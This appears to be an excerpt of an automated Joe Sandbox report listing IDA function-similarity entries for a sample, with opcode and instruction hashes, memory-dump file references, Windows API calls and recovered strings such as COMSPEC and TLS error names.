                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: f5032e0cc83a5b76d2c6ffb333611ad37586d5c38e90ebd814056ceaa53f5318
                    • Instruction ID: 938ac2c00cb14554d80a7b75bb915131925a8f3306dba4a312edd45a1c9bc13f
                    • Opcode Fuzzy Hash: f5032e0cc83a5b76d2c6ffb333611ad37586d5c38e90ebd814056ceaa53f5318
                    • Instruction Fuzzy Hash: 18B1C223F0A64691EB69BB91D180238E394EF44B84F898435DE7D877D5DFBCE64183A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                    • String ID:
                    • API String ID: 2138705365-0
                    • Opcode ID: 67138a13c051f2ea1599d0402960bcf59d0b5129e69f6316a665601d90c1bba5
                    • Instruction ID: a7fbcf3a0123014e0bc9b5017629a31e3d883e62307db11dbc1454724a4d0d6f
                    • Opcode Fuzzy Hash: 67138a13c051f2ea1599d0402960bcf59d0b5129e69f6316a665601d90c1bba5
                    • Instruction Fuzzy Hash: 1E91DF73F14B4585EB009FA4D8403AC6360FB48BA8F549236DE6C97B99EFB8D594C390
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3668304517-0
                    • Opcode ID: 128756f8641a17f8a7daf58ede0b23abeff417d1af0bd7bb739d1d1a0c1d64a7
                    • Instruction ID: 54bf12f9bd5e6f5d620d6b76052c4236d6744a0087d3715fcbc6085ae2d84fba
                    • Opcode Fuzzy Hash: 128756f8641a17f8a7daf58ede0b23abeff417d1af0bd7bb739d1d1a0c1d64a7
                    • Instruction Fuzzy Hash: FC51A4E0F086C686FB05BB29E844378E751EF45B84FD10039D6BC066D2DFECA58083A5
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 2067211477-0
                    • Opcode ID: d410c2e341d753668c7562e465c2f3fe3dced3562e905be142106d32ebfa3c1e
                    • Instruction ID: 7ffb88e5dd67c05672634c9efbb54a94e022cb3e0bbb2389be5ced7d2ac18014
                    • Opcode Fuzzy Hash: d410c2e341d753668c7562e465c2f3fe3dced3562e905be142106d32ebfa3c1e
                    • Instruction Fuzzy Hash: A0214A25E09B4286EF14AF65A440079E3A0BF84BA0F99453DEE6D537D9DFBCE40086A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _set_statfp
                    • String ID:
                    • API String ID: 1156100317-0
                    • Opcode ID: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
                    • Instruction ID: 0afaa65ee5d4efbe20ca0eca3c35c58c6fe705a64382ae25f2af0caa163a1fd4
                    • Opcode Fuzzy Hash: e65ba792651367d839098e214d5891407b2dde01c0b567b7a4e043ebbfca8b6f
                    • Instruction Fuzzy Hash: AD11B262E18AD743F7643924E5553F9C0516F58374F8902BCE97E4B2EE8FEC684441A3
                    APIs
                    • FlsGetValue.KERNEL32(?,?,?,00007FF7F1302ECB,?,?,00000000,00007FF7F1303166,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F131B42B
                    • FlsSetValue.KERNEL32(?,?,?,00007FF7F1302ECB,?,?,00000000,00007FF7F1303166,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F131B44A
                    • FlsSetValue.KERNEL32(?,?,?,00007FF7F1302ECB,?,?,00000000,00007FF7F1303166,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F131B472
                    • FlsSetValue.KERNEL32(?,?,?,00007FF7F1302ECB,?,?,00000000,00007FF7F1303166,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F131B483
                    • FlsSetValue.KERNEL32(?,?,?,00007FF7F1302ECB,?,?,00000000,00007FF7F1303166,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F131B494
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Value
                    • String ID:
                    • API String ID: 3702945584-0
                    • Opcode ID: b2f47840b8b9c5c009bb9f6ec95be3edb16bf4979d371b13d5ff5d5a9b2b6ba9
                    • Instruction ID: 29c8475f6aadcf01a65594c476ca974dcdfe34df487094e74172c12a30c228bf
                    • Opcode Fuzzy Hash: b2f47840b8b9c5c009bb9f6ec95be3edb16bf4979d371b13d5ff5d5a9b2b6ba9
                    • Instruction Fuzzy Hash: 4B117220E0824243FB54B7B19641579D1A15F543F0F9AA73DD53D367D9DFACA40242A1
                    APIs
                    • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B2B1
                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B2D0
                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B2F8
                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B309
                    • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B31A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Value
                    • String ID:
                    • API String ID: 3702945584-0
                    • Opcode ID: b38a0812632c02c16b83cc3975993a7e914d995941d3d7188eeb23bda1f3a1e8
                    • Instruction ID: 84cca99251e2f6981cc73c92118cdfa91bb5463653c93d650deb12411c41cdc9
                    • Opcode Fuzzy Hash: b38a0812632c02c16b83cc3975993a7e914d995941d3d7188eeb23bda1f3a1e8
                    • Instruction Fuzzy Hash: BA113C10E0920347FF68B6B154565BA91A14F55370FDA2B3CD93D2A2DADFECB41242F2
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                    • API String ID: 3215553584-1196891531
                    • Opcode ID: c92aa55c122d9f564a042f34397ad49531f7756b2213ca6cca04c5fa59226e14
                    • Instruction ID: 529bb8f1a59659ff8d98744cee86f409958a9f91258a0b2a098dc6d85bf5eee5
                    • Opcode Fuzzy Hash: c92aa55c122d9f564a042f34397ad49531f7756b2213ca6cca04c5fa59226e14
                    • Instruction Fuzzy Hash: 3881C732D0820287F7656F25C154279E6A0AF11B64FDB803CDA2D772D6CBADF90587B1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo
                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                    • API String ID: 3215553584-1196891531
                    • Opcode ID: 9a5701430e8243679f1243c237cd0e6dc721751d47cd0d60951dd46ee1703780
                    • Instruction ID: 0971fc4035d22d01b71743447cccc7a3c114f42165dcfaeeeafb110b620b4faf
                    • Opcode Fuzzy Hash: 9a5701430e8243679f1243c237cd0e6dc721751d47cd0d60951dd46ee1703780
                    • Instruction Fuzzy Hash: F481C572D0C10647FB756A388154279AA909F15B64FEF903CCA2A632D7CBADB84193E1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CallEncodePointerTranslator
                    • String ID: MOC$RCC
                    • API String ID: 3544855599-2084237596
                    • Opcode ID: 2d364d95687243c3b181cd46417f204310557b77680859db5af2121501d26352
                    • Instruction ID: 90084448824a84e74b486953e519f2c738e1db459ebaecc6f46c28bf414ded6f
                    • Opcode Fuzzy Hash: 2d364d95687243c3b181cd46417f204310557b77680859db5af2121501d26352
                    • Instruction Fuzzy Hash: 2A910173A08B858AE710EB64D8402ACBBE0FB05788F54413AEE9D57B99DF78D192C750
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CallEncodePointerTranslator
                    • String ID: MOC$RCC
                    • API String ID: 3544855599-2084237596
                    • Opcode ID: ccc5e4b4fc8220aa2e3a5c7290e89e745588f29462f2b8ea79782d41b13f63ab
                    • Instruction ID: da7613e7bfd79fdb7ebe67c51d018fe363852d581e7d26e0926be74f5ab91f12
                    • Opcode Fuzzy Hash: ccc5e4b4fc8220aa2e3a5c7290e89e745588f29462f2b8ea79782d41b13f63ab
                    • Instruction Fuzzy Hash: F66194329087C586E760AB15E4407AAB7A0FB857D8F444239EBAC53B99DFBCD190CB50
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=
                    • String ID: %s: %s$Serial Number$Signature Algorithm
                    • API String ID: 356670603-1527603233
                    • Opcode ID: d24cd0fb2c974990b245698adadf8b60b22e90d8d7b5c51932e451f50a7ff387
                    • Instruction ID: d87537addd334a83dbe0082455000580bbfc6f7d6280106e39e32cc056490b6e
                    • Opcode Fuzzy Hash: d24cd0fb2c974990b245698adadf8b60b22e90d8d7b5c51932e451f50a7ff387
                    • Instruction Fuzzy Hash: F2419B21B0878755FB10ABA194501F9ABA1BF15788FC40436DE7E976CAEFBCE504C7A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Maklocstr
                    • String ID: false$true
                    • API String ID: 2987148671-2658103896
                    • Opcode ID: 7737890b09bf963c193fc8e8b8f852c338a03559dd738bd0465b522fbd767e66
                    • Instruction ID: dc66080caaa849c9f84060e099f05223aad4450256f95c31caea1aeb1d663783
                    • Opcode Fuzzy Hash: 7737890b09bf963c193fc8e8b8f852c338a03559dd738bd0465b522fbd767e66
                    • Instruction Fuzzy Hash: 5E419923B08B459AE700DF74E4002ED73B4FB84B48F801526EE5D53A99EF78E5A5C394
                    APIs
                    • GetEnvironmentStringsW.KERNEL32(?,?,COMSPEC,00007FF7F1313893), ref: 00007FF7F1322C55
                    • FreeEnvironmentStringsW.KERNEL32(?,?,COMSPEC,00007FF7F1313893), ref: 00007FF7F1322CC7
                      • Part of subcall function 00007FF7F131B604: HeapAlloc.KERNEL32(?,?,00000000,00007FF7F1316B40,?,?,?,?,?,?,00000001,?,?,?,00000001,00007FF7F13169F6), ref: 00007FF7F131B642
                    • FreeEnvironmentStringsW.KERNEL32(?,?,COMSPEC,00007FF7F1313893), ref: 00007FF7F1322D26
                      • Part of subcall function 00007FF7F131B6E0: RtlFreeHeap.NTDLL(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B6F6
                      • Part of subcall function 00007FF7F131B6E0: GetLastError.KERNEL32(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B700
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
                    • String ID: COMSPEC
                    • API String ID: 3331406755-1631433037
                    • Opcode ID: bb1d59d09e9cb0386528951414e0698b901e226b3cb9b14e083c89a35899e292
                    • Instruction ID: bcb942ce49f73547fe06bd16afd778aea0643d2409833946fd0185f54d71cd55
                    • Opcode Fuzzy Hash: bb1d59d09e9cb0386528951414e0698b901e226b3cb9b14e083c89a35899e292
                    • Instruction Fuzzy Hash: 9331C931A0879582EB24BF116840079F6A4BF54FE4F84463DE96E537C5DF7CE4118390
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: SimpleString::operator=
                    • String ID: FALSE$TRUE
                    • API String ID: 356670603-1412513891
                    • Opcode ID: 4a6b7114147a74c34009b339fb4e256dc4e2b5828f54061223e5db19ee48ab58
                    • Instruction ID: bef7554368dd4b46d2ad1757b42e1687c51953b3dd9f5c49d8532fc85f7207e4
                    • Opcode Fuzzy Hash: 4a6b7114147a74c34009b339fb4e256dc4e2b5828f54061223e5db19ee48ab58
                    • Instruction Fuzzy Hash: 3D21D621B1D65746FB11B7A995501B9A7D2AF01394FC00431CABEC66DAEFDCE90187F0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLastsend
                    • String ID: SENT$Sending data failed (%d)
                    • API String ID: 1802528911-3459338696
                    • Opcode ID: f3d2537a36d7e6df86f749ee41553c9ddf7e7b30c03e48f4caab14ad97f4c1df
                    • Instruction ID: 5e59da528a4db9e28d9de3d287ae1b0e46bbbe4c1410c6cb9bdfe9c21c5e3864
                    • Opcode Fuzzy Hash: f3d2537a36d7e6df86f749ee41553c9ddf7e7b30c03e48f4caab14ad97f4c1df
                    • Instruction Fuzzy Hash: 2F012022B1C6C141D7209B5AF44006AAB10FF94BD0F946035FE6E87BA5CF6DD041C7D0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID:
                    • API String ID: 3668304517-0
                    • Opcode ID: aa204f485674e588fe7e754ceb877947d4ba4a4b5d4867f3f81bcba004f98202
                    • Instruction ID: 7347fdb7687e458ad4d066c3ef671e56f7b09b22a7bf69266e0c318a219ab8b0
                    • Opcode Fuzzy Hash: aa204f485674e588fe7e754ceb877947d4ba4a4b5d4867f3f81bcba004f98202
                    • Instruction Fuzzy Hash: E741D3A1F0D58A86FB08BB19E854378D711AF42B84FD00039D67C0A6D6DFEDA58483E4
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: Unknown error %d (%#x)
                    • API String ID: 1452528299-2414550090
                    • Opcode ID: 808d83368b5eca47f01ac30d58b2734cfcc88167ac817675af53d9ab8e0d4f3e
                    • Instruction ID: 5b2a902ae5ac019e53723bb5bc313f56f6c559e579998223ebfdbb1622d43d30
                    • Opcode Fuzzy Hash: 808d83368b5eca47f01ac30d58b2734cfcc88167ac817675af53d9ab8e0d4f3e
                    • Instruction Fuzzy Hash: CC318021B0868242FB157FA19410279E691AF84B94FC84035DF6E977DAEFBCE401CBB1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: Unknown error %lu (0x%08lX)
                    • API String ID: 1452528299-1512744739
                    • Opcode ID: 45db52d129272514d344d2c5257cb41e6a734851ed561a874b77d377912fd4e0
                    • Instruction ID: 97582bdc1a97d8b4daca51c312d2c4cbdc0dd6374f52423a3e4722058918d0c6
                    • Opcode Fuzzy Hash: 45db52d129272514d344d2c5257cb41e6a734851ed561a874b77d377912fd4e0
                    • Instruction Fuzzy Hash: 50118F32B0874282E7107F62A80006AF791AF84B90F880038DF5D437D6DFBCE5419BA5
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_CONTEXT_EXPIRED
                    • API String ID: 1452528299-1358876214
                    • Opcode ID: 49259ef3f97740b7bcc8aa33aa8235c920244522c04d52131931d69f9ac3b840
                    • Instruction ID: bd62504da963e5153920a1a95d0c0a5079e0c142b9421e71a3a4bf648da43945
                    • Opcode Fuzzy Hash: 49259ef3f97740b7bcc8aa33aa8235c920244522c04d52131931d69f9ac3b840
                    • Instruction Fuzzy Hash: 8D019222B1864286F711BF91A4401FAE291EF847A4FC80136DA1E427D1DFBCE581CBB0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X) - %s$SEC_E_CERT_WRONG_USAGE
                    • API String ID: 1452528299-3896346274
